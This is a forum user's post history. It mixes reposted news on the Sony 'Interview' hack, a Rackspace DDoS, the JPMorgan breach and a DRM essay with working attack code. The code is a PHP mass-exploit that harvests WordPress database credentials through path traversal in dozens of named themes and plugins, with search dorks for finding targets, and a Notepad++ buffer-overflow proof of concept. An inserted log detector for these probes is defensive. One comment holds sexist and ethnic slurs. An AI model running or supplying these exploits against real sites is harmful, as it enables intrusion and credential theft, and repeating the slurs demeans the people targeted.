Posts posted by Aerosol
-
(Reuters) - Sony Pictures made "The Interview" available online on Wednesday, a day before its theatrical release, after reversing a decision made a week ago to cancel the movie's release following a massive cyberattack.
The film was available for rental on Google Inc's YouTube site as of early Wednesday afternoon. Microsoft Corp and Sony itself are also showing the comedy, a day before its scheduled premiere at some 320 independent theaters.
"We chose the path of digital distribution first so as to reach as many people as possible on opening day, and we continue to seek other partners and platforms to further expand the release," Sony Entertainment Chief Executive Michael Lynton said in a statement.
He added that Sony had first reached out to Google, Microsoft "and other partners" on Dec. 17, the day the studio said it was canceling the movie's Christmas Day release.
The movie, which stars Seth Rogen and James Franco and is about a fictional plot to assassinate North Korean leader Kim Jong Un, triggered the most destructive cyberattack ever to target a U.S. company, resulting in the release of hundreds of embarrassing emails and confidential data.
U.S. President Barack Obama last week blamed the cyberattacks on North Korea and added to a chorus of criticism by politicians and Hollywood actors, screenwriters and directors accusing Sony of caving to the hackers' demands by censoring itself.
In addition to YouTube Movies, Google Play and Microsoft's Xbox Video, the comedy will be available on a dedicated website, www.seetheinterview.com, to rent for $5.99 or buy for $14.99. No cable or satellite TV operator has yet agreed to make "The Interview" available through video on demand (VOD).
The showing is a chance for Google and Microsoft, which have been bit players in a VOD market dominated by Apple Inc, Amazon.com Inc and cable and satellite operators, to raise their profile.
It was unclear the extent to which the online release would dampen moviegoers' appetite to see the comedy in the independent theaters that announced on Tuesday they planned to show it.
Many Christmas Day screenings were sold out, including one that begins right after midnight at the 184-seat Silent Movie Theatre in Los Angeles.
"I need to say that a comedy is best viewed in a theater full of people, so if you can, I'd watch it like that," Rogen tweeted. "Or call some friends over."
Google said it had weighed the security implications of screening the movie - described by reviewers as "profane" and "raunchy" - after Sony contacted the company about making it available online.
"IMPOSING CENSORSHIP"
"But after discussing all the issues, Sony and Google agreed that we could not sit on the sidelines and allow a handful of people to determine the limits of free speech in another country (however silly the content might be)," Google's chief legal officer, David Drummond, wrote in a blog post.
Google has an "enormous" infrastructure that is well tested in fighting off denial of service and other attacks, said Barrett Lyon, principal strategist with F5 Networks and an expert in Internet network security. "I wouldn't imagine seeing 'lights-out' at YouTube," he said, adding that Microsoft could be more vulnerable.
Sony pulled the movie after major theater chains refused to show it. That followed threats of September 11, 2001 style attacks from Guardians of Peace, the group that claimed responsibility for the cyberattacks against Sony.
The White House on Wednesday praised the decision to release the film.
"As the president made clear on Friday, we do not live in a country where a foreign dictator can start imposing censorship here in the United States," White House spokesman Eric Schultz said in a statement. "With today’s announcements, people can now make their own choices about the film, and that’s how it should be."
A national security official said on Tuesday that U.S. authorities did not take the hackers' threats against theatergoers seriously.
CNN, which first reported that Sony was in talks with Google's YouTube on releasing the movie, said the studio also had held talks with Apple about making the comedy available on its iTunes store but that the negotiations broke down.
Obama vowed in a news conference on Friday to respond to the cyberattack "in a place and timing and manner that we choose."
Japan, meanwhile, has begun working to ensure basic infrastructure is safe and to formulate its diplomatic response, officials said, fearing it could be a soft target for possible North Korean cyberattacks in the escalating row over the Sony Pictures hack.
And South Korea is seeking the cooperation of Chinese authorities in a probe into a cyberattack on its nuclear power plant operator after tracing multiple Internet addresses involved to a northeastern Chinese city near North Korea, a prosecution official said.
(This story has been refiled to correct the spelling to YouTube from Youtube)
(Additional reporting by Michele Gershberg and Liana Baker in New York, Jim Finkle in Boston, Meeyoung Cho in Seoul, Tim Kelly and Nobuhiro Kubo in Tokyo; Writing by Christian Plumb; Editing by Gunna Dickson and Steve Orlofsky)
-
#!/usr/bin/php -q
<?php
#===============================================================================
# *NAME*: Wordpress A.F.D Verification/ INURL - BRASIL
# *TYPE*: Arbitrary File Download
# *Tested on*: Linux
# *EXECUTE*: php exploit.php www.target.gov.us
# *OUTPUT*: WORDPRES_A_F_D.txt
# *AUTHOR*: Cleiton Pinheiro / NICK: GoogleINURL
# *EMAIL*: inurllbr@gmail.com
# *Blog*: http://blog.inurl.com.br
# *Twitter*: https://twitter.com/googleinurl
# *Fanpage*: https://fb.com/InurlBrasil
# *GIT:* https://github.com/googleinurl
# *YOUTUBE:* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
# *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
#
#------------------------------------------------------------------------------
# Command Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
#------------------------------------------------------------------------------
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#------------------------------------------------------------------------------
# *PRINT:* http://i.imgur.com/45BFlNe.png
#------------------------------------------------------------------------------
# *Description:*
# This exploit allows the attacker to exploit the Arbitrary File Download flaw in dozens of wordpress themes.
# Through regular expressions, the script performs the check for each target url, inspecting its wp-config.php file.
# Regular expressions:
# preg_match_all("(DB_NAME.*')", $body, $status['DB_NAME']);
# preg_match_all("(DB_USER.*')", $body, $status['DB_USER']);
# preg_match_all("(DB_PASSWORD.*')", $body, $status['DB_PASSWORD']);
# preg_match_all("(DB_HOST.*')", $body, $status['DB_HOST']);
# preg_match_all("(DB_CHARSET.*')", $body, $status['DB_CHARSET']);
#------------------------------------------------------------------------------
# *Usage info:*
# php script.php www.target.gov.us
# File download wp-config.php
# The flaw consists of an unvalidated $_GET parameter.
# The following fields are exploited for Arbitrary File Download
#
# *Check failure Arbitrary File Download*
#
# /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# /wp-content/force-download.php?file=../wp-config.php
# /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
# /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
# /wp-content/themes/markant/download.php?file=../../wp-config.php
# /wp-content/themes/yakimabait/download.php?file=./wp-config.php
# /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
# /wp-content/themes/felis/download.php?file=../wp-config.php
# /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
# /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
# /wp-content/themes/epic/includes/download.php?file=wp-config.php
# /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
# /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
# /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
# /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
# /wp-content/themes/lote27/download.php?download=../../../wp-config.php
# /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
# /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
#
# *D O R K'S:*
#------------------------------------------------------------------------------
# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork:: "Index of" & /wp-content/themes/ultimatum
#------------------------------------------------------------------------------
# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork:: "Index of" & /wp-content/themes/medicate/
#------------------------------------------------------------------------------
# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork:: "Index of" & /wp-content/themes/Centum/
#------------------------------------------------------------------------------
# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork:: "Index of" & /wp-content/themes/Avada/
#------------------------------------------------------------------------------
# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork:: "Index of" & /wp-content/themes/striking_r/
#------------------------------------------------------------------------------
# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
# Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
#------------------------------------------------------------------------------
# Dork Google: inurl:ajax-store-locator
# index of ajax-store-locator
# Vendor Homepage:: http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
#------------------------------------------------------------------------------
# WordPress cuckootap Theme Arbitrary File Download
# Google Dork:: "Index of" & /wp-content/themes/cuckootap/
# Vendor Homepage:: http://www.cuckoothemes.com/
#------------------------------------------------------------------------------
# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/
#------------------------------------------------------------------------------
# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork:: "Index of" & /wp-content/themes/ultimatum
#------------------------------------------------------------------------------
# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork:: "Index of" & /wp-content/themes/medicate/
#------------------------------------------------------------------------------
# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork:: "Index of" & /wp-content/themes/Centum/
#------------------------------------------------------------------------------
# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork:: "Index of" & /wp-content/themes/Avada/
#------------------------------------------------------------------------------
# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork:: "Index of" & /wp-content/themes/striking_r/
#------------------------------------------------------------------------------
# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
# Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
#------------------------------------------------------------------------------
# WordPress Trinity Theme Arbitrary File Download
# Vendor Homepage:: https://churchthemes.net/themes/trinity/
# Google Dork:: "Index of" & /wp-content/themes/trinity/
#------------------------------------------------------------------------------
# WordPress Lote27 Theme Arbitrary File Download
# Google Dork:: "Index of" & /wp-content/themes/lote27/
#------------------------------------------------------------------------------
# WordPress Revslider Theme Arbitrary File Download
# Vendor Homepage:: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Google Dork:: wp-admin & inurl:revslider_show_image
#------------------------------------------------------------------------------
#===============================================================================
$banner = "
_____
(_____) ____ _ _ _ _ _____ _ ____
_ _
(() ()) |_ _| \ | | | | | __ \| | | _ \
(_) |
\ / | | | \| | | | | |__) | | ______ | |_) |_ __ __ _ ___
_| |
\ / | | | . ` | | | | _ /| | |______| | _ <| '__/ _` / __|
| |
/=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | | (_| \__ \
| |
[___] |_____|_| \_|\____/|_| \_\______| |____/|_|
\__,_|___/_|_|
\n\033[1;37m0xNeither war between hackers, nor peace for the
system.\033[0m\r
";
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
function __plus() {
ob_flush();
flush();
}
print empty($argv[1]) ? exit("{$banner}0x[ERROR]: SET URL / Execute: php exploit.php www.target.gov.us\n") : NULL;
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
!filter_var($argv[1], FILTER_VALIDATE_URL) ? exit("{$banner}0x[ERROR]: SET URL / Execute: php exploit.php www.target.gov.us\n") : NULL;
print "\r\n{$banner}0x[EXPLOIT NAME]: WORDPRESS A.F.D / INURL - BRASIL";
print "\n------------------------------------------------------------------------------------------------------------------";
__plus();
$users = file_get_contents("{$argv[1]}/?author=1");
__plus();
preg_match('/<title>(.*?)<\/title>/si', $users, $user);
$wpuser = explode('|', $user[1]);
$headers = get_headers($argv[1], 1);
__plus();
print "\n0x " . date("h:m:s") . " [INFO][COD]:: ";
print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
print "\n0x " . date("h:m:s") . " [INFO][Server]:: ";
is_array($headers['Server']) ? print_r($headers['Server'][0]) :
print_r($headers['Server']);
print "\n0x " . date("h:m:s") . " [INFO][X-Pingback]:: ";
is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) :
print_r($headers['X-Pingback']);
print "\n0x " . date("h:m:s") . " [INFO][X-Powered-By]:: ";
is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) :
print_r($headers['X-Powered-By']);
print_r("\n0x " . date("h:m:s") . " [INFO][TARGET]:: {$argv[1]} | [WP USER]:: " . str_replace("\n", '', $wpuser[0]));
print "\n0x " . date("h:m:s") . " [INFO][OUTPUT FILE]:: WORDPRESS_A_F_D.txt\n";
__plus();
__request($argv[1],
'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php');
__request($argv[1], '/wp-content/force-download.php?file=../wp-config.php');
__request($argv[1],
'/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php');
__request($argv[1],
'/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php');
__request($argv[1],
'/wp-content/themes/markant/download.php?file=../../wp-config.php');
__request($argv[1],
'/wp-content/themes/yakimabait/download.php?file=./wp-config.php');
__request($argv[1],
'/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php');
__request($argv[1],
'/wp-content/themes/felis/download.php?file=../wp-config.php');
__request($argv[1],
'/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php');
__request($argv[1],
'/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php');
__request($argv[1],
'/wp-content/themes/epic/includes/download.php?file=wp-config.php');
__request($argv[1],
'/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php');
__request($argv[1],
'/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php');
__request($argv[1],
'/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php');
__request($argv[1],
'/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php');
__request($argv[1],
'/wp-content/themes/lote27/download.php?download=../../../wp-config.php');
__request($argv[1],
'/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php');
__request($argv[1],
'/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php');
function __request($url, $plugin) {
$objcurl = curl_init();
$caminho = NULL;
$status = array();
curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
curl_setopt($objcurl, CURLOPT_HEADER, 1);
curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
$corpo = curl_exec($objcurl);
if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {
return __request($url, "{$plugin}&file=" .
str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
}
__plus();
if (preg_match("#DB_NAME#i", $corpo) || preg_match("#readfile(#i", $corpo)) {
//-----------------------------------------------------------------------------
preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
//-----------------------------------------------------------------------------
__plus();
$res = "\n------------------------------------------------------------------------------------------------------------------\n\033[0;32m0x " . date("h:m:s") . " [INFO][VULN]:: \033[1;37m [ " . date("d-m-Y H:i:s") . " ]\n";
$res.= ("\033[0;32m0x " . date("h:m:s") . " [INFO][VULN][DB]::\033[1;37m " . $status['DB_NAME'][0][0]);
$res.= ("::" . $status['DB_USER'][0][0]);
$res.= ("::" . $status['DB_PASSWORD'][0][0]);
$res.= ("::" . $status['DB_HOST'][0][0]);
$res.= ("::" . $status['DB_CHARSET'][0][0]);
$res.= "\n\033[0;32m0x " . date("h:m:s") . " [INFO][VULN][URL]::\033[1;37m{$url}{$plugin}\033[0m";
$res.= "\n------------------------------------------------------------------------------------------------------------------\n\033[0m";
print $res;
$res = str_replace('[1;37m', '', str_replace('[0m', '', str_replace('[0;32m', '', $res)));
file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
__plus();
} else {
print "\n\033[1;31m0x " . date("h:m:s") . " [INFO][NOT VULN]::\033[1;37m {$url}{$plugin} \n\033[0m";
}
curl_close($objcurl);
__plus();
}
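Added example, not part of the script above or its author's code: a defender-side detector that runs over web-server access logs and flags the probe pattern the script's description lists, that is, requests to the theme and plugin download handlers with a traversal path to wp-config.php in the `file`-style parameter, the revslider_show_image action, or the script's own `::INURLBR::` user-agent string. The log lines are constructed samples in Apache combined format; the endpoint basenames and parameter names are taken from the "Check failure" list above, and the reason labels and severity split are my own.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" access-log entry (the log lines below are constructed samples).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Query parameters that the listed endpoints use to carry the requested file path.
PATH_PARAMS = {"file", "download", "img", "imgurl", "download_file"}
# Basenames of the theme/plugin download handlers in the list above.
KNOWN_HANDLERS = {"force-download.php", "view-pdf.php", "download.php",
                  "downloadlink.php", "sl_file_download.php"}
REVSLIDER_ACTION = "revslider_show_image"
# Signature of the scanner's own User-Agent (set with CURLOPT_USERAGENT above).
SCANNER_UA_MARK = "INURLBR"


def is_traversal_to_config(value):
    """True if a parameter value climbs directories or names wp-config.php outright.
    Decoded twice so %2e%2e / %252e%252e variants are caught; backslashes normalised."""
    v = unquote(unquote(value)).replace("\\", "/")
    return ".." in v.split("/") or v.endswith("wp-config.php")


def classify(line):
    """Return a finding dict for a suspicious request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qsl(parts.query, keep_blank_values=True)
    basename = parts.path.rsplit("/", 1)[-1]
    reasons, suspicious = [], False
    # Corroborating only: legitimate downloads also go through these handlers.
    if basename in KNOWN_HANDLERS and parts.path.startswith("/wp-content/"):
        reasons.append("known download handler")
    if basename == "admin-ajax.php" and ("action", REVSLIDER_ACTION) in params:
        reasons.append("revslider_show_image action")
        suspicious = True
    for key, val in params:
        if key in PATH_PARAMS and is_traversal_to_config(val):
            reasons.append("traversal in %s=" % key)
            suspicious = True
            break
    if SCANNER_UA_MARK in m.group("ua"):
        reasons.append("scanner user-agent")
        suspicious = True
    if not suspicious:
        return None
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "status": int(m.group("status")),
        # The log cannot show the body, but a 200 with a non-empty body means the
        # handler may really have served the file: treat it as an incident, not a probe.
        "likely_served": m.group("status") == "200" and m.group("size") not in ("-", "0"),
        "reasons": reasons,
    }


def scan(lines):
    """Run classify() over an iterable of log lines and keep only the findings."""
    return [f for f in (classify(l) for l in lines) if f]


# Constructed sample log: two probes from one source, one successful pull, two benign hits.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Dec/2014:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)"',
    '203.0.113.7 - - [24/Dec/2014:10:01:03 +0000] "GET /wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 404 215 "-" "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)"',
    '198.51.100.4 - - [24/Dec/2014:10:02:00 +0000] "GET /wp-content/themes/markant/download.php?file=brochure.pdf HTTP/1.1" 200 88123 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [24/Dec/2014:10:02:05 +0000] "GET /index.php?p=12 HTTP/1.1" 200 5400 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [24/Dec/2014:10:01:04 +0000] "GET /wp-content/themes/lote27/download.php?download=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        tag = "SERVED" if f["likely_served"] else "probe"
        print("%s %s %s (%s)" % (tag, f["ip"], f["path"], ", ".join(f["reasons"])))
```

A 200 on one of these requests is the signal to rotate the database credentials and salts in wp-config.php, since the log alone cannot prove the handler refused the path.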
#!/usr/bin/python
# Exploit Title: NotePad++ v6.6.9 Buffer Overflow
# URL Vendor: http://notepad-plus-plus.org/
# Vendor Name: NotePad
# Version: 6.6.9
# Date: 22/12/2014
# CVE: CVE-2014-1004
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Risk: Medium
#Description:
#Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages.
#Running in the MS Windows environment, its use is governed by GPL License.
#Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed
#and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon
#dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment.
#Proof Concept
#http://i.imgur.com/TTDtxJM.jpg
#Code
import struct
def little_endian(address):
return struct.pack("<L",address)
poc ="\x41" * 591
poc+="\xeb\x06\x90\x90"
poc+=little_endian(0x1004C31F)
poc+="\x90" * 80
poc+="\x90" * (20000 - len(poc))
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit = header + footer
filename = "notepad.xml"
file = open(filename , "w")
file.write(exploit)
file.close()
-
Romania has the highest number of illiterate people in Europe: 6% of Romanians cannot read or write | Social a1.ro
The contemporary world: Top 10 songs stolen by manele singers
I'm proud that we have beautiful `whores`; all the foreigners admire them, especially since they are slim while their Russian fatties weigh 200 kilos. About music/gypsies and `12-year-old hackers` I have other opinions.
The truth is we do have beautiful whores...
On another note, we do have good music too, but many (extremely many) brown-skinned people
-
You have a PM.
-
Rackspace says it has recovered from a nasty distributed denial of service attack that it says may have seen “a portion of legitimate traffic to our DNS infrastructure … inadvertently blocked.”
The trouble started just before lunchtime on Monday, US central time, and persisted until 11 hours later.
Over on the company's Google+ page Rackspace warned of “intermittent periods of latency, packet loss, or connectivity failures when attempting to reach rackspace.com or subdomains within rackspace.com.”
The company's status report later confirmed it had “... identified a UDP DDoS attack targeting the DNS servers in our IAD, ORD, and LON data centers [Northern Virginia, Chicago and London]. As a result of this issue, authoritative DNS resolution for any new request to the DNS servers began to fail in the affected data centers. In order to stabilize the issue, our teams placed the impacted DNS infrastructure behind mitigation services. This service is designed to protect our infrastructure, however, due to the nature of the event, a portion of legitimate traffic to our DNS infrastructure may be inadvertently blocked. Our teams are actively working to mitigate the attack and provide service stability.”
Rackspace is now confident things are back in order, as it has blacklisted DNS servers that were “sending both legitimate and DDoS traffic to Rackspace”. Users may not be entirely out of the woods, as its most recent update says “If you continue to experience adverse impact, please reach out to your support teams and provide trace route information for further investigations.”
A full root cause analysis of the incident is under way.
-
Hackers broke into JPMorgan's network through a giant security hole left open by a failure to switch on two-factor authentication on an overlooked server.
The New York Times reports that technicians at JPM had failed to upgrade one of its network servers, meaning that access was possible without knowing a combination of a password and the value of a one-time code.
The newspaper learnt of this failure to apply industry-standard security practice from unnamed sources familiar with the details of ongoing investigations into the breach.
The working theory is that hackers used compromised access to the insecure server as a launch pad for attacks against more sensitive systems. It’s nearly always easier to hack systems once a foothold inside a targeted organisation has been obtained. Such stepping-stone attack tactics have been common hacking practice for years.
JPMorgan Chase admitted in September that the names, addresses, phone numbers and e-mail addresses of 83 million account holders had been exposed in one of the biggest data security breaches in history. 76 million of those, along with seven million small biz customers, had their private information publicly exposed as a result of the breach, which was rumoured to be the handiwork of Russian cyber-criminals.
The attack was reportedly detected by the bank's security team in late July 2014. JPMorgan Chase has played down the impact of the attack and there are no reports of widespread fraud as a result of it.
The main risk comes from the possibility that crooks might be able to produce more convincing phishing attacks using the stolen information.
-
We live in a world made of computers. Your car is a computer that drives down the freeway at 60 mph with you strapped inside. If you live or work in a modern building, computers regulate its temperature and respiration. And we're not just putting our bodies inside computers—we're also putting computers inside our bodies. I recently exchanged words in an airport lounge with a late arrival who wanted to use the sole electrical plug, which I had beat him to, fair and square. “I need to charge my laptop,” I said. “I need to charge my leg,” he said, rolling up his pants to show me his robotic prosthesis. I surrendered the plug.
You and I and everyone who grew up with earbuds? There's a day in our future when we'll have hearing aids, and chances are they won't be retro-hipster beige transistorized analog devices: They'll be computers in our heads.
And that's why the current regulatory paradigm for computers, inherited from the 16-year-old stupidity that is the Digital Millennium Copyright Act, needs to change. As things stand, the law requires that computing devices be designed to sometimes disobey their owners, so that their owners won't do something undesirable. To make this work, we also have to criminalize anything that might help owners change their computers to let the machines do that supposedly undesirable thing.
This approach to controlling digital devices was annoying back in, say, 1995, when we got the DVD player that prevented us from skipping ads or playing an out-of-region disc. But it will be intolerable and deadly dangerous when our 3-D printers, self-driving cars, smart houses, and even parts of our bodies are designed with the same restrictions. Because those restrictions would change the fundamental nature of computers. Speaking in my capacity as a dystopian science fiction writer: This scares the hell out of me.
The general-purpose computer is one of the crowning achievements of industrial society. Prior to its invention, electronic calculating engines were each hardwired to do just one thing, like calculate ballistics tables. John von Neumann's “von Neumann architecture” and Alan Turing's “Turing-complete computer” provided the theoretical basis for building a calculating engine that could run any program that could be expressed in symbolic language. That breakthrough still ripples through society, revolutionizing every corner of our world. When everything is made of computers, an improvement in computers makes everything better.
But there's a terrible corollary to that virtuous cycle: Any law or regulation that undermines computers' utility or security also ripples through all the systems that have been colonized by the general-purpose computer. And therein lies the potential for untold trouble and mischief.
Because while we've spent the past 70 years perfecting the art of building computers that can run every single program, we have no idea how to build a computer that can run every program except the one that infringes copyright or prints out guns or lets a software-based radio be used to confound air-traffic control signals or cranks up the air-conditioning even when the power company sends a peak-load message to it.
The closest approximation we have for “a computer that runs all the programs except the one you don't like” is “a computer that is infected with spyware out of the box.” By spyware I mean operating-system features that monitor the computer owner's commands and cancel them if they're on a blacklist. Think, for example, of image scanners that can detect if you're trying to scan currency and refuse to further process the image. As much as we want to prevent counterfeiting, imposing codes and commands that you can't overrule is a recipe for disaster.
Why? Because for such a system to work, remote parties must have more privileges on it than the owner. And such a security model must hide its operation from the computer's normal processes. When you ask your computer to do something reasonable, you expect it to say, “Yes, master” (or possibly “Are you sure?”), not “I CAN'T LET YOU DO THAT, DAVE.”
If the “I CAN'T LET YOU DO THAT, DAVE” message is being generated by a program on your desktop labeled HAL9000.exe, you will certainly drag that program into the trash. If your computer's list of running programs shows HAL9000.exe lurking in the background like an immigration agent prowling an arrivals hall, looking for sneaky cell phone users to shout at, you will terminate that process with a satisfied click.
So the only way to sustain HAL9000.exe and its brethren—the programs that today keep you from installing non-App Store apps on your iPhone and tomorrow will try to stop you from printing gun.stl on your 3-D printer—is to design the computer to hide them from you. And that creates vulnerabilities that make your computer susceptible to malicious hacking. Consider what happened in 2005, when Sony BMG started selling CDs laden with the notorious Sony rootkit, software designed to covertly prevent people from copying music files. Once you put one of Sony BMG's discs into your computer's CD drive, it would change your OS so that files beginning with $sys$ were invisible to the system. The CD then installed spyware that watched for attempts to rip any music CD and silently blocked them. Of course, virus writers quickly understood that millions of PCs were now blind to any file that began with $sys$ and changed the names of their viruses accordingly, putting legions of computers at risk.
Code always has flaws, and those flaws are easy for bad guys to find. But if your computer has deliberately been designed with a blind spot, the bad guys will use it to evade detection by you and your antivirus software. That's why a 3-D printer with anti-gun-printing code isn't a 3-D printer that won't print guns—the bad guys will quickly find a way around that. It's a 3-D printer that is vulnerable to hacking by malware creeps who can use your printer's “security” against you: from bricking your printer to screwing up your prints to introducing subtle structural flaws to simply hijacking the operating system and using it to stage attacks on your whole network.
This business of designing computers to deliberately weasel and lie isn't the worst thing about the war on the general-purpose computer and the effort to bodge together a “Turing-almost-complete” architecture that can run every program except for one that distresses a government, police force, corporation, or spy agency.
No, the worst part is that, like the lady who had to swallow the bird to catch the spider that she'd swallowed to catch the fly, any technical system that stops you from being the master of your computer must be accompanied by laws that criminalize information about its weaknesses. In the age of Google, it simply won't do to have “uninstall HAL9000.exe” return a list of videos explaining how to jailbreak your gadgets, just as videos that explain how to jailbreak your iPhone today could technically be illegal; making and posting them could potentially put their producers (and the sites that host them) at risk of prosecution.
